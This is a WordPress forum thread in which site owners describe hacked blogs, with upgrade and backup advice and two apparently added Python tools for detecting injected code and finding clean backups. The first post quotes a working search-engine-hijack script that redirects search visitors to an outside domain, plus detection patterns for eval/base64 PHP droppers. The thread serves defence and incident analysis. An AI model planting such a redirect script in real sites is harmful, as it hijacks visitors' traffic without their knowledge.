WarriorForum - Internet Marketing Forums > The Warrior Forum > Main Internet Marketing Discussion Forum
06-30-2009, 01:07 PM   #1
Do You Want To Join The Wordpress Hacked Club?

Yes, I'm now a sad member of that group.

Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.

1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.

On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than running its hack all the way through. My guess is it's probably some kind of redirect.

2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.

The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:

<script>
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length).split("&")[0];
</script>

We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!

I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.

So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.

Wendell

WendellC
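As an added example (it is not code from this post, nor from WordPress), here is a small Python scanner for the two indicators the post describes: an eval() wrapped around a decoder call in PHP files, and an inline script in the rendered page that reads document.referrer, tests it for a search engine's hostname and reassigns window.location. The second trait explains why the redirect only showed up for visitors arriving from a search result and not for the owner typing the URL directly. The regexes are my assumptions about the usual shape of such injections, not signatures from this incident; the PHP files and HTML pages are constructed here, the base64 literal decodes to a harmless comment, and the redirect target is a reserved .invalid name.

```python
from __future__ import annotations

import base64
import re
import tempfile
from pathlib import Path

# Heuristics for obfuscated PHP injections. These regexes are assumptions about
# the usual shape of such droppers, not signatures taken from this incident.
PHP_INJECTION_PATTERNS = {
    "eval_of_decoder": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\(", re.I),
    "long_base64_literal": re.compile(
        r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{80,}['\"]\s*\)", re.I),
}

# A search-engine hijack in a rendered page: an inline script that reads the
# referrer, tests it for a search engine's hostname and reassigns the location.
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
READS_REFERRER = re.compile(r"document\.referrer", re.I)
TESTS_SEARCH_ENGINE = re.compile(r"indexOf\(\s*[\"'](?:google|msn|yahoo|altavista|aol|ask)\.", re.I)
SETS_LOCATION = re.compile(r"(?:window|document|top)\.location(?:\.href)?\s*=", re.I)


def scan_php_source(source: str) -> list[str]:
    """Names of the injection heuristics that match one PHP file's text."""
    return [name for name, rx in PHP_INJECTION_PATTERNS.items() if rx.search(source)]


def scan_rendered_html(html: str) -> list[str]:
    """Bodies of inline scripts that show all three hijack traits. A script
    that merely logs document.referrer (analytics) does not qualify."""
    return [
        body.strip()
        for body in SCRIPT_BLOCK.findall(html)
        if READS_REFERRER.search(body) and TESTS_SEARCH_ENGINE.search(body) and SETS_LOCATION.search(body)
    ]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Every .php file at any depth under root that trips a heuristic, since
    the second injection sat below index.php rather than in it."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed samples, not material from the hacked sites. The base64 literal
# decodes to a harmless comment; the redirect target is a reserved test name.
_FAKE_PAYLOAD = base64.b64encode(b"/* constructed sample, not a real payload */" * 3).decode()
CLEAN_PHP = "<?php\n// legitimate theme file\nget_header();\n"
INJECTED_PHP = f"<?php eval(base64_decode('{_FAKE_PAYLOAD}')); ?>\n" + CLEAN_PHP
CLEAN_HTML = '<html><script>var r=document.referrer; console.log("came from", r);</script></html>'
HIJACKED_HTML = (
    '<html><script>var r=document.referrer,t="";'
    'if(r.indexOf("google.")!=-1)t="q";'
    'if(t.length)window.location="http://redirect.example.invalid/?q="+r;'
    "</script></html>"
)


def demo_scan_tree() -> dict[str, list[str]]:
    """Lay the two PHP samples out like a WordPress tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        theme = root / "wp-content" / "themes" / "x"
        theme.mkdir(parents=True)
        (root / "index.php").write_text(CLEAN_PHP)
        (theme / "functions.php").write_text(INJECTED_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    print("PHP findings:", demo_scan_tree())
    print("clean page:", scan_rendered_html(CLEAN_HTML))
    print("hijacked page:", scan_rendered_html(HIJACKED_HTML))
```

Run the PHP scan from a shell account against the document root, not through the site itself, and fetch pages for the HTML check with a search-engine referrer header set, since that is the only condition under which the hijack script does anything visible. A hit on the PHP heuristics is a strong signal but not proof, and a miss is not a clean bill: an attacker can split or re-encode the payload, which is why a file-integrity baseline is the more reliable check.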
06-30-2009, 02:10 PM   #2

Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
VeitSchenk
06-30-2009, 02:15 PM   #3

I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.

Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet.

VegasGreg
06-30-2009, 02:22 PM   #4

If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.

PixelPerfect
06-30-2009, 02:28 PM   #5

They make security plugins for WP; you might want to take a gander at some of those.

Keep your eyes open; sometimes they do something simple so it appears like that's all they did.
twright
06-30-2009, 02:49 PM   #6

Quote:
Originally Posted by VeitSchenk
Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
Ah, I'm embarrassed to say it but it was version 2.04! I think it was the first WP blog I ever created and I forgot to upgrade it over the years. Most of my blogs are now in the 2.6 - 2.7 range. I just have to go back and get them all upgraded to something with a few less security holes...

Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema.

I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences...

*sigh*

Wendell

WendellC
06-30-2009, 03:05 PM   #7

I have a wordpress site, but I haven't had such problems. Probably because I have only a few visitors monthly.
kameleon
06-30-2009, 03:30 PM   #8

Definitely gotta keep your WP up to date.

There's a security scan plugin that helps too.
JohnnyPhunk
06-30-2009, 03:40 PM   #9

I used to use wordpress. It is a very powerful piece of blogging software, but after being hacked myself I went back to good old-fashioned HTML and javascript. Also, wordpress has a habit of running slow at peak times and my users were getting fed up with waiting 30 seconds for a page to load. HTML is so fast because there is little code to slow the process down, and it's the same with PHP.

Paid Surveys
06-30-2009, 04:03 PM   #10

I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure it's not a real mess and easy to hack.
GuerrillaIM
06-30-2009, 04:34 PM   #11

I would like to hitchhike on this issue by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel, but after that I am stumped as to what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed

edd666666
06-30-2009, 04:51 PM   #12

Quote:
Originally Posted by edd666666
I would like to hitchhike on this issue by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel, but after that I am stumped as to what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed
Ed, at Bluehost cpanel, click on the Wordpress Icon, then click on "my installs" and you can upgrade from there. Alternately, you can go to your wordpress dashboard for that site, and near the top there should be an "upgrade to 2.8" link.

Best,
David

JustaWizard
06-30-2009, 04:58 PM   #13

The oldest version of Wordpress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect", because I deleted plugins one by one (at BlueHost's suggestion) until I isolated the offending plugin. Now I have 2.8 up with all the plugins including "redirect" and things have been fine.

I guess that plugins and Wordpress are just vulnerable???

David

JustaWizard
06-30-2009, 05:19 PM   #14
TheRichJerksNet (Guest)

Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

It's not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years have seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James
06-30-2009, 05:39 PM   #15

Quote:
Originally Posted by TheRichJerksNet
Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

It's not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years have seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James
Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David

JustaWizard
06-30-2009, 05:59 PM   #16
TheRichJerksNet (Guest)

Quote:
Originally Posted by JustaWizard
Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David
Sent you a PM David...

James
07-01-2009, 12:30 AM   #17

Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell

WendellC
07-01-2009, 12:36 AM   #18

I think I was one of the very first members.

valerieSONORA
07-01-2009, 12:42 AM   #19

I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.

Tom

Tom Dean
07-01-2009, 12:44 AM   #20

Once about 5 of my wp sites (which I wasn't updating for several months) were hacked by some Saudi Arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page. Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didn't even visit these sites for months).

They could hack because I wasn't updating my wp or the plugins. After this lesson, I religiously update all my wordpress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of wordpress.
phantom76
07-01-2009, 12:48 AM   #21
TheRichJerksNet (Guest)

Quote:
Originally Posted by clickguy
Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell
Yeah ... Do your own updates, do not use any plugins or auto updates - This includes the auto update that wordpress has. This is a huge security risk when you do.

Also do NOT update as soon as a new release is out, wait until it is stable.

James
07-01-2009, 12:59 AM   #22

I second the suggestion of not updating as soon as Wordpress releases the next major update.
Wait a few weeks until the dust settles.
I.e.:
*.*.Y - update is safe immediately.
*.Y - wait 2 weeks before applying.
Y.* - wait 4 weeks before applying.

Gleb

MemberWing
07-08-2009, 02:03 PM   #23

I have a plugin that works easily with Wordpress to secure your BLOG...My WP-Padlock program secures Wordpress easily and quickly, and comes with an installation video and info on how to secure the vulnerabilities in Wordpress...

You can find the plugin in my signature below...

~AzSno...

P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems, and Nokia Firewalls and Security Devices...)...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security...

azsno
03-29-2011, 04:33 PM   #24

Just had 10 wordpress blogs hacked.....
They just come up with the standard wp theme and say "HACKED BY ALI", all content gone.
classdancer
03-29-2011, 04:36 PM   #25

For all clients I build sites for, I almost insist on including full-blown, off-site, daily or weekly website backups, including all files and the database.

...and of course to maintain plugins and wordpress upgrades.

Gleb

MemberWing
03-29-2011, 05:50 PM   #26

Quote:
Originally Posted by VeitSchenk
Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
2.7 is extremely vulnerable with several DOZEN published exploits.

The thing is that zero day exploits really aren't that dangerous for folks like us that aren't national household names. But once these exploits are published there are forums out there very similar to this one, but with a different focus. People actually post exploits to help out the new script kiddies and sell them software to help them find and attack blogs just like yours.

danemorgan
03-29-2011, 05:52 PM   #27

Quote:
Originally Posted by MemberWing
For all clients I build sites for, I almost insist on including full-blown, off-site, daily or weekly website backups, including all files and the database.

...and of course to maintain plugins and wordpress upgrades.

Gleb
That's all well and good, but really, by the time many hacks these days end up getting noticed, your backups going back several months are compromised.

These days and these kinds of hacks it is less about street cred and more about cash money. Most of the time, now, if you notice you have been hacked, the hack failed.

danemorgan
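One way to act on this point, as an added example that belongs to neither poster and is not part of WordPress: keep a SHA-256 manifest of the site's files, taken right after each clean install or intentional upgrade and stored away from the web server, and keep one manifest per backup generation. Comparing each generation's code files (PHP, JS, .htaccess) against the baseline finds the newest generation that is still clean, so you restore that one instead of the most recent. Files under wp-content/uploads change legitimately and are ignored for that decision, though a .php file appearing there still counts as a code change. The manifests are constructed here, with digests of made-up contents.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

# Files that should never change between intentional upgrades.
CODE_SUFFIXES = (".php", ".js", ".htaccess")


def build_manifest(root: Path) -> dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest.
    Take it right after a clean install or upgrade and store it off the web
    server: whoever can edit PHP there can also edit a manifest kept beside it."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifests(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Added, removed and modified paths between two manifests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def is_code_file(path: str) -> bool:
    return path.endswith(CODE_SUFFIXES)


def code_changes(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Only the code-file differences; uploads and other content are ignored."""
    d = diff_manifests(baseline, current)
    return sorted(p for kind in ("added", "removed", "modified") for p in d[kind] if is_code_file(p))


def last_clean_generation(baseline: dict[str, str], generations: list[tuple[str, dict[str, str]]]) -> str | None:
    """generations holds (label, manifest) pairs ordered oldest to newest. Walk
    forward and stop at the first generation whose code differs from the
    baseline: it and everything newer carry the change, so the generation just
    before it is the newest safe restore point (None if even the oldest differs)."""
    last_clean = None
    for label, manifest in generations:
        if code_changes(baseline, manifest):
            break
        last_clean = label
    return last_clean


def _digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed manifests (not from any real site): digests of made-up contents.
BASELINE = {
    "index.php": _digest(b"<?php require 'wp-blog-header.php';"),
    "wp-content/themes/x/functions.php": _digest(b"<?php // clean theme"),
    "wp-content/uploads/2011/01/photo.jpg": _digest(b"jpeg bytes"),
}
GEN_JAN = dict(BASELINE)  # identical to the baseline
GEN_FEB = {**BASELINE, "wp-content/uploads/2011/02/new.jpg": _digest(b"another jpeg")}  # content only
GEN_MAR = {**GEN_FEB, "wp-content/themes/x/functions.php": _digest(b"<?php // tampered theme")}  # code modified
GEN_APR = {**GEN_MAR, "wp-content/uploads/2011/04/shell.php": _digest(b"<?php // dropped file")}  # PHP dropped in uploads
GENERATIONS = [("2011-01", GEN_JAN), ("2011-02", GEN_FEB), ("2011-03", GEN_MAR), ("2011-04", GEN_APR)]


def demo_manifest_roundtrip() -> bool:
    """Write two constructed files to a temp dir and check build_manifest hashes them as expected."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_bytes(b"<?php // sample")
        (root / "wp-content" / "uploads" / "a.txt").write_bytes(b"text")
        manifest = build_manifest(root)
    return manifest == {"index.php": _digest(b"<?php // sample"), "wp-content/uploads/a.txt": _digest(b"text")}


if __name__ == "__main__":
    print("manifest round-trip ok:", demo_manifest_roundtrip())
    for label, m in GENERATIONS:
        print(label, "code changes:", code_changes(BASELINE, m))
    print("newest safe restore point:", last_clean_generation(BASELINE, GENERATIONS))
```

The baseline has to be retaken after every intentional upgrade, otherwise a legitimate update looks like tampering; the database dump in each backup deserves the same treatment, since injected content and rogue admin accounts live there rather than in files.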
03-29-2011, 05:59 PM   #28

The reason Wordpress seems insecure is the same reason Windows seems insecure.

Potential.

If you are going to write a script to inject code into something are you going to spend your time trying to attack a 1,000 user base or a 1,000,000 user base? The work is the same, the payoff is dramatically different.

A WordPress version is already being hacked at by hackers before most Wordpress users even know it exists.

danemorgan
Tags: club, exploit, hacked, join, virus, wordpress

All times are GMT -6.